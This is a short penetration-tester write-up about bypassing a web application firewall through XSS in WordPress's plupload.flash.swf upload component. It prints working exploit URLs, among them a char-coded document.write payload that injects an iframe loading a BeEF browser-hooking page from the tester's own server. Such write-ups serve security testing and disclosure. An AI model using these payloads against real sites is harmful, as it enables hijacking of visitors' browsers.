XSS WAF Bypass Using CharCode() Encoding

Recently I had found a potential XSS injection point, while testing a client's web app. Unfortunately, most of the common XSS techniques did not work on this particular Word Press plugin 'plupload.flash.swf'.

Found the XSS injection point here:

http://webhost/wp-includes/js/plupload/plupload.flash.swf?id=

And got an initial alert box:

http://webhost/wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28c%29{alert%281%29;}//
(Which displays an alert box with a value of “1” – you cannot input [a-zA-Z] for some reason.

I spent the earlier part of the morning trying to get it to do more, or allow <script> tags, but I realized where it’s injecting the javascript, you can’t use the html tagging.

I bypassed that limitation using CharCode() encoding and got the standard alert box with [a-zA-Z] displaying. But I wanted to still try to take it a next step and get the browser hooked into BeEF.

http:///wp-includes/js/plupload/plupload.flash.swf?id=\%22));}catch(e){alert(String.fromCharCode(120,66,49,78,52,82,89,120));}//

So, I thought of using a 'document.write' and encoding html tagging within that, or basically writing a new page to the browser. This writes a NEW page to the browser and contains a <script>alert(“XSS”)</script>

It’s like XSS within XSS!

Now with that POC, I encoded a new page with an iframe to redirect into my BeEF instance…Look at this string LOL.

http:///wp-includes/js/plupload/plupload.flash.swf?id=\"));}catch(e){document.write(String.fromCharCode(60,104,116,109,108,62,60,98,111,100,121,62,60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,58,51,48,48,48,47,100,101,109,111,115,47,98,97,115,105,99,46,104,116,109,108,34,62,60,47,105,102,114,97,109,101,62,60,47,98,111,100,121,62,60,47,104,116,109,108,62));}//

And Bingo! Browser is now hooked…We've defeated the WAF and created a dangerous XSS string!

Props to Uncle Jim's charcode decoder/encoder:
http://jdstiles.com/java/cct.html